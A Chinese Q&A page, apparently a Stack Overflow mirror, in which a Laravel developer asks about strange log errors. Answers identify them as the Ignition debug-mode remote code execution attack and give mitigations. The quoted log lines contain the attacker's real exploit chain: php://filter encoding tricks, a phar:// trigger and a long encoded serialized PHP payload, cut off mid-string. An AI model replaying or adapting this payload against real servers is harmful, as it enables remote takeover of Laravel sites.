file_get_contents(phar://../storage/logs/laravel.log/test.txt):无法打开流:phar 内部损坏
Posted
技术标签:
【中文标题】file_get_contents(phar://../storage/logs/laravel.log/test.txt):无法打开流:phar 内部损坏【英文标题】:file_get_contents(phar://../storage/logs/laravel.log/test.txt): failed to open stream: internal corruption of phar 【发布时间】:2021-06-05 14:29:48 【问题描述】:我在本地和生产服务器上有一个 Laravel 8.6.0 Web 应用程序,两者都是完全相同的 php 和 apache 版本。但我只在生产服务器实现中遇到错误。
我所有的 laravel 日志都充满了以下错误。如您所见,这些错误发生在同一时间窗口(凌晨 2 点 48 分),然后一小时零几分钟后(凌晨 4 点 15 分)再次记录相同的错误。
[2021-03-07 02:48:53] local.ERROR: file_put_contents(php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log): failed to open stream: operation failed "exception":"[object] (ErrorException(code: 0): file_put_contents(php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log): failed to open stream: operation failed at /var/www/copa/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:69)
[2021-03-07 02:48:57] local.ERROR: file_get_contents(aa): failed to open stream: No such file or directory "exception":"[object] (ErrorException(code: 0): file_get_contents(aa): failed to open stream: No such file or directory at /var/www/copa/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:75)
[2021-03-07 02:49:27] local.ERROR: file_get_contents(phar://../storage/logs/laravel.log/test.txt): failed to open stream: internal corruption of phar "/var/www/copa/storage/logs/laravel.log" (__HALT_COMPILER(); not found) "exception":"[object] (ErrorException(code: 0): file_get_contents(phar://../storage/logs/laravel.log/test.txt): failed to open stream: internal corruption of phar "/var/www/copa/storage/logs/laravel.log" (__HALT_COMPILER(); not found) at /var/www/copa/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:75)
[2021-03-07 02:49:58] local.ERROR: file_get_contents(=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=75=00=43=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=58=00=43=00=51=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=34=00=4F=00=54=00=41=00=36=00=49=00=6D=00=56=00=6A=00=61=00=47=00=38=00=67=00=4D=00=47=00=4A=00=6B=00=4E=00=7A=00=6B=00=35=00=4D=00=47=00=45=00=67=00=4A=00=69=00=59=00=67=00=5A=00=57=00=4E=00=6F=00=62=00=79=00=42=00=4A=00=65=00=55=00=56=00=32=00=57=00=57=00=31=00=73=00=64=00=55=00=77=00=79=00=53=00=6D=00=68=00=6A=00=4D=00=6D=00=64=00=4C=00=59=00=30=00=64=00=30=00=63=00=47=00=4A=00=48=00=64=00=32=00=64=00=4D=00=56=00=31=00=6C=00=6E=00=5A=00=57=00=35=00=4F=00=4D=00=6C=00=6C=00=33=00=63=00=48=00=64=00=68=00=4D=00=6D=00=78=00=7A=00=59=00=6B=00=4E=00=42=00=64=00=46=00=70=00=70=00=51=00=6E=00=64=00=61=00=52=00=31=00=5A=00=74=00=57=00=6C=00=63=00=31=00=61=00=31=00=70=00=59=00=53=00=6D=00=74=00=44=00=62=00=6B=00=4A=00=79=00=59=00=56=00=64=00=34=00=63=00=30=00=6C=00=44=00=4D=00=57=00=31=00=4A=00=53=00=46=00=5A=00=33=00=57=00=6B=00=64=00=47=00=4D=00=46=00=70=00=58=00=54=00=6D=00=39=00=61=00=56=00=30=00=35=00=79=00=57=00=6C=00=68=00=4B=00=61=00=30=00=4E=00=6E=00=63=00=47=00=31=00=6B=00=56=00=7A=00=56=00=71=00=5A=00=45=00=64=00=73=00=64=00=6D=00=4A=00=70=00=51=00=6D=00=5A=00=59=00=4D=00=6B=00=34=00=78=00=59=00=32=00=31=00=33=00=62=00=30=00=74=00=54=00=51=00=6A=00=64=00=44=00=61=00=55=00=46=00=6E=00=59=00=32=00=31=00=57=00=61=00=46=00=70=00=44=00=51=00=6E=00=64=00=6A=00=62=00=54=00=6B=00=77=00=59=00=6E=00=6C=00=43=00=65=00=6C=00=70=00=59=00=53=00=6A=00=4A=00=61=00=57=00=45=00=6C=00=6E=00=59=00=30=00=64=00=47=00=4D=00=47=00=46=00=44=00=51=00=54=00=68=00=51=00=52=00=48=00=64=00=72=00=53=00=30=00=64=00=57=00=61=00=6D=00=46=00=48=00=4F=00=47=00=64=00=4B=00=53=00=48=00=4E=00=34=00=54=00=48=00=6B=00=34=00=64=00=6B=00=78=00=35=00=51=00=6A=00=6C=00=4C=00=55=00=57=00=39=00=6E=00=53=00=55=00=56=00=53=00=55=00=46=00=46=00=36=00=4D=00=48=00=5A=00=4B=00=53=00=48=00=52=00=33=00=57=00=56=00=68=00=53=00=62=00=30=00=78=00=35=00=4F=00=47=00=64=00=4D=00=65=00=54=00=6B=00=35=00=51=00=32=00=6C=00=42=00=5A=00=31=00=4E=00=46=00=4F=00=56=00=52=00=57=00=52=00=44=00=42=00=72=00=5A=00=54=00=4E=00=4F=00=62=00=47=00=4E=00=75=00=57=00=6D=00=78=00=6A=00=61=00=54=00=68=00=32=00=54=00=32=00=6C=00=77=00=4F=00=55=00=4E=00=70=00=51=00=57=00=64=00=56=00=52=00=54=00=6C=00=54=00=56=00=6B=00=51=00=77=00=61=00=32=00=55=00=7A=00=54=00=6D=00=78=00=6A=00=62=00=6C=00=70=00=73=00=59=00=32=00=6B=00=34=00=64=00=6B=00=74=00=71=00=63=00=44=00=6C=00=44=00=61=00=55=00=46=00=6E=00=56=00=7A=00=46=00=7A=00=5A=00=32=00=56=00=44=00=53=00=57=00=74=00=6C=00=4D=00=47=00=68=00=51=00=56=00=54=00=46=00=53=00=4F=00=55=00=6C=00=70=00=51=00=54=00=6C=00=51=00=55=00=30=00=49=00=30=00=53=00=57=00=6C=00=53=00=4E=00=31=00=56=00=46=00=4F=00=56=00=4E=00=57=00=53=00=44=00=42=00=70=00=53=00=55=00=59=00=78=00=5A=00=45=00=6C=00=44=00=57=00=57=00=31=00=4A=00=52=00=6B=00=4A=00=51=00=56=00=57=00=78=00=52=00=4F=00=55=00=39=00=45=00=51=00=55=00=74=00=44=00=61=00=55=00=46=00=6E=00=57=00=6C=00=68=00=6F=00=62=00=46=00=6C=00=35=00=51=00=58=00=70=00=51=00=52=00=44=00=52=00=32=00=57=00=6B=00=64=00=57=00=4D=00=6B=00=77=00=7A=00=55=00=6D=00=70=00=6A=00=51=00=7A=00=68=00=72=00=5A=00=54=00=42=00=6F=00=55=00=46=00=55=00=78=00=55=00=6A=00=6C=00=4D=00=65=00=56=00=4A=00=52=00=56=00=44=00=46=00=4B=00=56=00=55=00=4E=00=70=00=51=00=57=00=64=00=61=00=56=00=30=00=35=00=76=00=59=00=6E=00=6C=00=42=00=64=00=46=00=70=00=58=00=4E=00=47=00=64=00=4A=00=61=00=32=00=52=00=47=00=56=00=6B=00=4E=00=42=00=61=00=32=00=55=00=77=00=55=00=6C=00=42=00=52=00=4D=00=7A=00=42=00=6E=00=55=00=30=00=5A=00=53=00=56=00=56=00=56=00=44=00=4F=00=48=00=68=00=4D=00=61=00=6B=00=4A=00=6A=00=59=00=32=00=78=00=34=00=64=00=56=00=4E=00=48=00=4F=00=58=00=70=00=6B=00=52=00=47=00=39=00=6E=00=53=00=6B=00=68=00=30=00=53=00=56=00=51=00=78=00=54=00=6C=00=56=00=6D=00=56=00=6E=00=68=00=35=00=57=00=45=00=63=00=31=00=59=00=
在我的 .env 文件中,我已将 log_channel 配置为每天,所以我很奇怪 phar 需要 laravel.log/test.txt?这是某种攻击吗?
我已经开发 laravel 应用程序 5 年了,这是我第一次遇到这些错误。我有点担心有人试图入侵此服务器。
提前致谢。
【问题讨论】:
删除 bootstrap/cache config.php 中的文件,然后运行 php artisan optimize 和 composer dump-autoload 【参考方案1】:应该是自动攻击吧。将您的 APP_DEBUG 设置为 false 并检查此问题 https://github.com/facade/ignition/issues/350
更多信息在这里https://www.ambionics.io/blog/laravel-debug-rce
【讨论】:
谢谢。实际上,我确实找到了问题并将应用程序调试设置为 false,但不知道它会起作用,事实证明确实如此。标记为正确答案,因为它已修复。 从链接中,将IGNITION_ENABLE_RUNNABLE_SOLUTIONS
设置为false也应该可以解决问题
@DerekS 为了更好地理解,您应该提及 IGNITION_ENABLE_RUNNABLE_SOLUTIONS 的位置以上是关于file_get_contents(phar://../storage/logs/laravel.log/test.txt):无法打开流:phar 内部损坏的主要内容,如果未能解决你的问题,请参考以下文章
php流,stream,以及include/file_get_contents等的不全面深度解析